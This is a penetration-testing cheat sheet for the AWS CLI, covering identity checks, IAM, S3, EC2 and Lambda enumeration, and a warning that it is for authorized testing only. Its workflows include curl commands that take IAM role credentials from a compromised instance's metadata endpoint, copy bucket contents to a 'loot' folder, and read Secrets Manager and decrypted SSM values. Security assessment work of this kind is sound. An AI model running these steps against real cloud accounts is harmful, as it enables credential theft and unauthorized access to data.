AWS CLI Cheat Sheet
Command-line interface for AWS enumeration, credential validation, and misconfiguration discovery during cloud assessments.
Overview
The AWS CLI interacts with all major AWS APIs. In pentests, use it after obtaining access keys, instance roles, or SSRF-to-metadata to enumerate S3, IAM, EC2, Lambda, and secrets.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o awscliv2.zipunzip awscliv2.zip && sudo ./aws/installaws --versionConfigure profile
aws configureEssential commands
Verify identity
aws sts get-caller-identityList S3 buckets
aws s3 lsList EC2 instances (all regions loop)
aws ec2 describe-instances --region us-east-1Download bucket
aws s3 sync s3://bucket-name ./loot/ --no-sign-request # only if publicCommon workflows
On compromised EC2 (IMDSv1)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLEexport AWS_ACCESS_KEY_ID=...export AWS_SECRET_ACCESS_KEY=...export AWS_SESSION_TOKEN=...aws sts get-caller-identityIAM enumeration —
aws iam list-usersaws iam list-rolesaws iam list-attached-user-policies --user-name USERaws iam get-user-policy --user-name USER --policy-name POLICYaws iam simulate-principal-policy --policy-source-arn arn:aws:iam::123:user/USER--action-names s3:GetObject iam:CreateUser --resource-arns '*'S3 misconfiguration —
aws s3 ls s3://target-bucket/aws s3api get-bucket-acl --bucket target-bucketaws s3api get-bucket-policy --bucket target-bucketaws s3 cp s3://target-bucket/secret.zip .Multi-region EC2 / Lambda —
for r in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); doecho "=== $r ==="aws ec2 describe-instances --region $r --query 'Reservations[].Instances[].PublicIpAddress'doneaws lambda list-functions --region us-east-1Secrets Manager / SSM —
aws secretsmanager list-secrets --region us-east-1aws secretsmanager get-secret-value --secret-id prod/db/passwordaws ssm describe-parameters --region us-east-1aws ssm get-parameter --name /app/key --with-decryptionFlags reference
--profile NAME | Use named profile |
|---|---|
--region REGION | Override default region |
--output json\ | table\ |
--query JMESPath | Filter output |
--no-sign-request | Unsigned (public S3 only) |
AWS_PROFILE / AWS_DEFAULT_REGION | Environment overrides |
Tips
- Run Pacu or Prowler after CLI confirms valid creds for deeper checks.
- IMDSv2 requires token header — harder from simple SSRF.
- aws iam get-account-authorization-details dumps policies (large JSON).
- CloudTrail may log every CLI call — scope and ROE matter.